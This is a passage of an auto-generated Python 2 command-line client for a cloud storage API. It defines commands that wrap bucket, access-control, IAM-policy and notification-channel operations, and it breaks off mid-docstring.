params = GetGlobalParamsFromFlags()
for field in params.all_fields():
value = params.get_assigned_value(field.name)
if value != field.default:
client.AddGlobalParam(field.name, value)
banner = """
== storage interactive console ==
client: a storage client
apitools_base: base apitools module
messages: the generated messages module
"""
local_vars = {
'apitools_base': apitools_base,
'client': client,
'client_lib': client_lib,
'messages': messages,
}
if platform.system() == 'Linux':
console = apitools_base_cli.ConsoleWithReadline(
local_vars, histfile=FLAGS.history_file)
else:
console = code.InteractiveConsole(local_vars)
try:
console.interact(banner)
except SystemExit as e:
return e.code
class BucketAccessControlsDelete(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.Delete."""
usage = """bucketAccessControls_delete <bucket> <entity>"""
def __init__(self, name, fv):
super(BucketAccessControlsDelete, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Permanently deletes the ACL entry for the specified entity on the
specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketAccessControlsDeleteRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.bucketAccessControls.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsGet(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.Get."""
usage = """bucketAccessControls_get <bucket> <entity>"""
def __init__(self, name, fv):
super(BucketAccessControlsGet, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Returns the ACL entry for the specified entity on the specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
allAuthenticatedUsers.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketAccessControlsGetRequest(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
result = client.bucketAccessControls.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsInsert(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.Insert."""
usage = """bucketAccessControls_insert <bucket>"""
def __init__(self, name, fv):
super(BucketAccessControlsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entity',
None,
u'The entity holding the permission, in one of the following forms: '
u'- user-userId - user-email - group-groupId - group-email - '
u'domain-domain - project-team-projectId - allUsers - '
u'allAuthenticatedUsers Examples: - The user liz@example.com would '
u'be user-liz@example.com. - The group example@googlegroups.com '
u'would be group-example@googlegroups.com. - To refer to all members'
u' of the Google Apps for Business domain example.com, the entity '
u'would be domain-example.com.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#bucketAccessControl',
u'The kind of item this is. For bucket access control entries, this '
u'is always storage#bucketAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER, WRITER, or '
u'OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Creates a new ACL entry on the specified bucket.
Args:
bucket: The name of the bucket.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
id: The ID of the access-control entry.
kind: The kind of item this is. For bucket access control entries, this
is always storage#bucketAccessControl.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER, WRITER, or
OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.BucketAccessControl(
bucket=bucket.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entity'].present:
request.entity = FLAGS.entity.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.bucketAccessControls.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.List."""
usage = """bucketAccessControls_list <bucket>"""
def __init__(self, name, fv):
super(BucketAccessControlsList, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Retrieves ACL entries on the specified bucket.
Args:
bucket: Name of a bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketAccessControlsListRequest(
bucket=bucket.decode('utf8'),
)
result = client.bucketAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsPatch(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.Patch."""
usage = """bucketAccessControls_patch <bucket> <entity>"""
def __init__(self, name, fv):
super(BucketAccessControlsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#bucketAccessControl',
u'The kind of item this is. For bucket access control entries, this '
u'is always storage#bucketAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER, WRITER, or '
u'OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket, entity):
"""Updates an ACL entry on the specified bucket. This method supports
patch semantics.
Args:
bucket: The name of the bucket.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
id: The ID of the access-control entry.
kind: The kind of item this is. For bucket access control entries, this
is always storage#bucketAccessControl.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER, WRITER, or
OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.BucketAccessControl(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.bucketAccessControls.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.Update."""
usage = """bucketAccessControls_update <bucket> <entity>"""
def __init__(self, name, fv):
super(BucketAccessControlsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'domain',
None,
u'The domain associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'email',
None,
u'The email address associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'entityId',
None,
u'The ID for the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'etag',
None,
u'HTTP 1.1 Entity tag for the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'The ID of the access-control entry.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'storage#bucketAccessControl',
u'The kind of item this is. For bucket access control entries, this '
u'is always storage#bucketAccessControl.',
flag_values=fv)
flags.DEFINE_string(
'projectTeam',
None,
u'The project team associated with the entity, if any.',
flag_values=fv)
flags.DEFINE_string(
'role',
None,
u'The access permission for the entity. Can be READER, WRITER, or '
u'OWNER.',
flag_values=fv)
flags.DEFINE_string(
'selfLink',
None,
u'The link to this access-control entry.',
flag_values=fv)
def RunWithArgs(self, bucket, entity):
"""Updates an ACL entry on the specified bucket.
Args:
bucket: The name of the bucket.
entity: The entity holding the permission, in one of the following
forms: - user-userId - user-email - group-groupId - group-email -
domain-domain - project-team-projectId - allUsers -
allAuthenticatedUsers Examples: - The user liz@example.com would be
user-liz@example.com. - The group example@googlegroups.com would be
group-example@googlegroups.com. - To refer to all members of the
Google Apps for Business domain example.com, the entity would be
domain-example.com.
Flags:
domain: The domain associated with the entity, if any.
email: The email address associated with the entity, if any.
entityId: The ID for the entity, if any.
etag: HTTP 1.1 Entity tag for the access-control entry.
id: The ID of the access-control entry.
kind: The kind of item this is. For bucket access control entries, this
is always storage#bucketAccessControl.
projectTeam: The project team associated with the entity, if any.
role: The access permission for the entity. Can be READER, WRITER, or
OWNER.
selfLink: The link to this access-control entry.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.BucketAccessControl(
bucket=bucket.decode('utf8'),
entity=entity.decode('utf8'),
)
if FLAGS['domain'].present:
request.domain = FLAGS.domain.decode('utf8')
if FLAGS['email'].present:
request.email = FLAGS.email.decode('utf8')
if FLAGS['entityId'].present:
request.entityId = FLAGS.entityId.decode('utf8')
if FLAGS['etag'].present:
request.etag = FLAGS.etag.decode('utf8')
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['projectTeam'].present:
request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
if FLAGS['role'].present:
request.role = FLAGS.role.decode('utf8')
if FLAGS['selfLink'].present:
request.selfLink = FLAGS.selfLink.decode('utf8')
result = client.bucketAccessControls.Update(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsDelete(apitools_base_cli.NewCmd):
"""Command wrapping buckets.Delete."""
usage = """buckets_delete <bucket>"""
def __init__(self, name, fv):
super(BucketsDelete, self).__init__(name, fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u'If set, only deletes the bucket if its metageneration matches this '
u'value.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u'If set, only deletes the bucket if its metageneration does not '
u'match this value.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Permanently deletes an empty bucket.
Args:
bucket: Name of a bucket.
Flags:
ifMetagenerationMatch: If set, only deletes the bucket if its
metageneration matches this value.
ifMetagenerationNotMatch: If set, only deletes the bucket if its
metageneration does not match this value.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsDeleteRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
result = client.buckets.Delete(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsGet(apitools_base_cli.NewCmd):
"""Command wrapping buckets.Get."""
usage = """buckets_get <bucket>"""
def __init__(self, name, fv):
super(BucketsGet, self).__init__(name, fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration matches the given value.",
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration does not match the given value.",
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Returns metadata for the specified bucket.
Args:
bucket: Name of a bucket.
Flags:
ifMetagenerationMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration matches the
given value.
ifMetagenerationNotMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration does not
match the given value.
projection: Set of properties to return. Defaults to noAcl.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsGetRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['projection'].present:
request.projection = messages.StorageBucketsGetRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.buckets.Get(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsGetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping buckets.GetIamPolicy."""
usage = """buckets_getIamPolicy <bucket>"""
def __init__(self, name, fv):
super(BucketsGetIamPolicy, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Returns an IAM policy for the specified bucket.
Args:
bucket: Name of a bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsGetIamPolicyRequest(
bucket=bucket.decode('utf8'),
)
result = client.buckets.GetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsInsert(apitools_base_cli.NewCmd):
"""Command wrapping buckets.Insert."""
usage = """buckets_insert <project>"""
def __init__(self, name, fv):
super(BucketsInsert, self).__init__(name, fv)
flags.DEFINE_string(
'bucket',
None,
u'A Bucket resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
u'Apply a predefined set of access controls to this bucket.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedDefaultObjectAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of default object access controls to this '
u'bucket.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl, unless the bucket '
u'resource specifies acl or defaultObjectAcl properties, when it '
u'defaults to full.',
flag_values=fv)
def RunWithArgs(self, project):
"""Creates a new bucket.
Args:
project: A valid API project identifier.
Flags:
bucket: A Bucket resource to be passed as the request body.
predefinedAcl: Apply a predefined set of access controls to this bucket.
predefinedDefaultObjectAcl: Apply a predefined set of default object
access controls to this bucket.
projection: Set of properties to return. Defaults to noAcl, unless the
bucket resource specifies acl or defaultObjectAcl properties, when it
defaults to full.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsInsertRequest(
project=project.decode('utf8'),
)
if FLAGS['bucket'].present:
request.bucket = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucket)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageBucketsInsertRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['predefinedDefaultObjectAcl'].present:
request.predefinedDefaultObjectAcl = messages.StorageBucketsInsertRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageBucketsInsertRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.buckets.Insert(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsList(apitools_base_cli.NewCmd):
"""Command wrapping buckets.List."""
usage = """buckets_list <project>"""
def __init__(self, name, fv):
super(BucketsList, self).__init__(name, fv)
flags.DEFINE_integer(
'maxResults',
None,
u'Maximum number of buckets to return.',
flag_values=fv)
flags.DEFINE_string(
'pageToken',
None,
u'A previously-returned page token representing part of the larger '
u'set of results to view.',
flag_values=fv)
flags.DEFINE_string(
'prefix',
None,
u'Filter results to buckets whose names begin with this prefix.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to noAcl.',
flag_values=fv)
def RunWithArgs(self, project):
"""Retrieves a list of buckets for a given project.
Args:
project: A valid API project identifier.
Flags:
maxResults: Maximum number of buckets to return.
pageToken: A previously-returned page token representing part of the
larger set of results to view.
prefix: Filter results to buckets whose names begin with this prefix.
projection: Set of properties to return. Defaults to noAcl.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsListRequest(
project=project.decode('utf8'),
)
if FLAGS['maxResults'].present:
request.maxResults = FLAGS.maxResults
if FLAGS['pageToken'].present:
request.pageToken = FLAGS.pageToken.decode('utf8')
if FLAGS['prefix'].present:
request.prefix = FLAGS.prefix.decode('utf8')
if FLAGS['projection'].present:
request.projection = messages.StorageBucketsListRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.buckets.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsPatch(apitools_base_cli.NewCmd):
"""Command wrapping buckets.Patch."""
usage = """buckets_patch <bucket>"""
def __init__(self, name, fv):
super(BucketsPatch, self).__init__(name, fv)
flags.DEFINE_string(
'bucketResource',
None,
u'A Bucket resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration matches the given value.",
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration does not match the given value.",
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
u'Apply a predefined set of access controls to this bucket.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedDefaultObjectAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of default object access controls to this '
u'bucket.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to full.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Updates a bucket. This method supports patch semantics.
Args:
bucket: Name of a bucket.
Flags:
bucketResource: A Bucket resource to be passed as the request body.
ifMetagenerationMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration matches the
given value.
ifMetagenerationNotMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration does not
match the given value.
predefinedAcl: Apply a predefined set of access controls to this bucket.
predefinedDefaultObjectAcl: Apply a predefined set of default object
access controls to this bucket.
projection: Set of properties to return. Defaults to full.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsPatchRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['bucketResource'].present:
request.bucketResource = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucketResource)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageBucketsPatchRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['predefinedDefaultObjectAcl'].present:
request.predefinedDefaultObjectAcl = messages.StorageBucketsPatchRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageBucketsPatchRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.buckets.Patch(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsSetIamPolicy(apitools_base_cli.NewCmd):
"""Command wrapping buckets.SetIamPolicy."""
usage = """buckets_setIamPolicy <bucket>"""
def __init__(self, name, fv):
super(BucketsSetIamPolicy, self).__init__(name, fv)
flags.DEFINE_string(
'policy',
None,
u'A Policy resource to be passed as the request body.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Updates an IAM policy for the specified bucket.
Args:
bucket: Name of a bucket.
Flags:
policy: A Policy resource to be passed as the request body.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsSetIamPolicyRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['policy'].present:
request.policy = apitools_base.JsonToMessage(messages.Policy, FLAGS.policy)
result = client.buckets.SetIamPolicy(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsTestIamPermissions(apitools_base_cli.NewCmd):
"""Command wrapping buckets.TestIamPermissions."""
usage = """buckets_testIamPermissions <bucket> <permissions>"""
def __init__(self, name, fv):
super(BucketsTestIamPermissions, self).__init__(name, fv)
def RunWithArgs(self, bucket, permissions):
"""Tests a set of permissions on the given bucket to see which, if any,
are held by the caller.
Args:
bucket: Name of a bucket.
permissions: Permissions to test.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsTestIamPermissionsRequest(
bucket=bucket.decode('utf8'),
permissions=permissions.decode('utf8'),
)
result = client.buckets.TestIamPermissions(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketsUpdate(apitools_base_cli.NewCmd):
"""Command wrapping buckets.Update."""
usage = """buckets_update <bucket>"""
def __init__(self, name, fv):
super(BucketsUpdate, self).__init__(name, fv)
flags.DEFINE_string(
'bucketResource',
None,
u'A Bucket resource to be passed as the request body.',
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration matches the given value.",
flag_values=fv)
flags.DEFINE_string(
'ifMetagenerationNotMatch',
None,
u'Makes the return of the bucket metadata conditional on whether the '
u"bucket's current metageneration does not match the given value.",
flag_values=fv)
flags.DEFINE_enum(
'predefinedAcl',
u'authenticatedRead',
[u'authenticatedRead', u'private', u'projectPrivate', u'publicRead', u'publicReadWrite'],
u'Apply a predefined set of access controls to this bucket.',
flag_values=fv)
flags.DEFINE_enum(
'predefinedDefaultObjectAcl',
u'authenticatedRead',
[u'authenticatedRead', u'bucketOwnerFullControl', u'bucketOwnerRead', u'private', u'projectPrivate', u'publicRead'],
u'Apply a predefined set of default object access controls to this '
u'bucket.',
flag_values=fv)
flags.DEFINE_enum(
'projection',
u'full',
[u'full', u'noAcl'],
u'Set of properties to return. Defaults to full.',
flag_values=fv)
def RunWithArgs(self, bucket):
"""Updates a bucket.
Args:
bucket: Name of a bucket.
Flags:
bucketResource: A Bucket resource to be passed as the request body.
ifMetagenerationMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration matches the
given value.
ifMetagenerationNotMatch: Makes the return of the bucket metadata
conditional on whether the bucket's current metageneration does not
match the given value.
predefinedAcl: Apply a predefined set of access controls to this bucket.
predefinedDefaultObjectAcl: Apply a predefined set of default object
access controls to this bucket.
projection: Set of properties to return. Defaults to full.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketsUpdateRequest(
bucket=bucket.decode('utf8'),
)
if FLAGS['bucketResource'].present:
request.bucketResource = apitools_base.JsonToMessage(messages.Bucket, FLAGS.bucketResource)
if FLAGS['ifMetagenerationMatch'].present:
request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
if FLAGS['ifMetagenerationNotMatch'].present:
request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
if FLAGS['predefinedAcl'].present:
request.predefinedAcl = messages.StorageBucketsUpdateRequest.PredefinedAclValueValuesEnum(FLAGS.predefinedAcl)
if FLAGS['predefinedDefaultObjectAcl'].present:
request.predefinedDefaultObjectAcl = messages.StorageBucketsUpdateRequest.PredefinedDefaultObjectAclValueValuesEnum(FLAGS.predefinedDefaultObjectAcl)
if FLAGS['projection'].present:
request.projection = messages.StorageBucketsUpdateRequest.ProjectionValueValuesEnum(FLAGS.projection)
result = client.buckets.Update(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class ChannelsStop(apitools_base_cli.NewCmd):
"""Command wrapping channels.Stop."""
usage = """channels_stop"""
def __init__(self, name, fv):
super(ChannelsStop, self).__init__(name, fv)
flags.DEFINE_string(
'address',
None,
u'The address where notifications are delivered for this channel.',
flag_values=fv)
flags.DEFINE_string(
'expiration',
None,
u'Date and time of notification channel expiration, expressed as a '
u'Unix timestamp, in milliseconds. Optional.',
flag_values=fv)
flags.DEFINE_string(
'id',
None,
u'A UUID or similar unique string that identifies this channel.',
flag_values=fv)
flags.DEFINE_string(
'kind',
u'api#channel',
u'Identifies this as a notification channel used to watch for changes'
u' to a resource. Value: the fixed string "api#channel".',
flag_values=fv)
flags.DEFINE_string(
'params',
None,
u'Additional parameters controlling delivery channel behavior. '
u'Optional.',
flag_values=fv)
flags.DEFINE_boolean(
'payload',
None,
u'A Boolean value to indicate whether payload is wanted. Optional.',
flag_values=fv)
flags.DEFINE_string(
'resourceId',
None,
u'An opaque ID that identifies the resource being watched on this '
u'channel. Stable across different API versions.',
flag_values=fv)
flags.DEFINE_string(
'resourceUri',
None,
u'A version-specific identifier for the watched resource.',
flag_values=fv)
flags.DEFINE_string(
'token',
None,
u'An arbitrary string delivered to the target address with each '
u'notification delivered over this channel. Optional.',
flag_values=fv)
flags.DEFINE_string(
'type',
None,
u'The type of delivery mechanism used for this channel.',
flag_values=fv)
def RunWithArgs(self):
"""Stop watching resources through this channel
Flags:
address: The address where notifications are delivered for this channel.
expiration: Date and time of notification channel expiration, expressed
as a Unix timestamp, in milliseconds. Optional.
id: A UUID or similar unique string that identifies this channel.
kind: Identifies this as a notification channel used to watch for
changes to a resource. Value: the fixed string "api#channel".
params: Additional parameters controlling delivery channel behavior.
Optional.
payload: A Boolean value to indicate whether payload is wanted.
Optional.
resourceId: An opaque ID that identifies the resource being watched on
this channel. Stable across different API versions.
resourceUri: A version-specific identifier for the watched resource.
token: An arbitrary string delivered to the target address with each
notification delivered over this channel. Optional.
type: The type of delivery mechanism used for this channel.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.Channel(
)
if FLAGS['address'].present:
request.address = FLAGS.address.decode('utf8')
if FLAGS['expiration'].present:
request.expiration = int(FLAGS.expiration)
if FLAGS['id'].present:
request.id = FLAGS.id.decode('utf8')
if FLAGS['kind'].present:
request.kind = FLAGS.kind.decode('utf8')
if FLAGS['params'].present:
request.params = apitools_base.JsonToMessage(messages.Channel.ParamsValue, FLAGS.params)
if FLAGS['payload'].present:
request.payload = FLAGS.payload
if FLAGS['resourceId'].present:
request.resourceId = FLAGS.resourceId.decode('utf8')
if FLAGS['resourceUri'].present:
request.resourceUri = FLAGS.resourceUri.decode('utf8')
if FLAGS['token'].present:
request.token = FLAGS.token.decode('utf8')
if FLAGS['type'].present:
request.type = FLAGS.type.decode('utf8')
result = client.channels.Stop(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class DefaultObjectAccessControlsDelete(apitools_base_cli.NewCmd):
"""Command wrapping defaultObjectAccessControls.Delete."""
usage = """defaultObjectAccessControls_delete <bucket> <entity>"""
def __init__(self, name, fv):
super(DefaultObjectAccessControlsDelete, self).__init__(name, fv)
def RunWithArgs(self, bucket, entity):
"""Permanently deletes the default object ACL entry for the specified
entity on the specified bucket.
Args:
bucket: Name of a bucket.
entity: The entity holding the permission. Can be user-userId, user-
emailAddress, group-groupId, group-emailAddress, allUsers, or
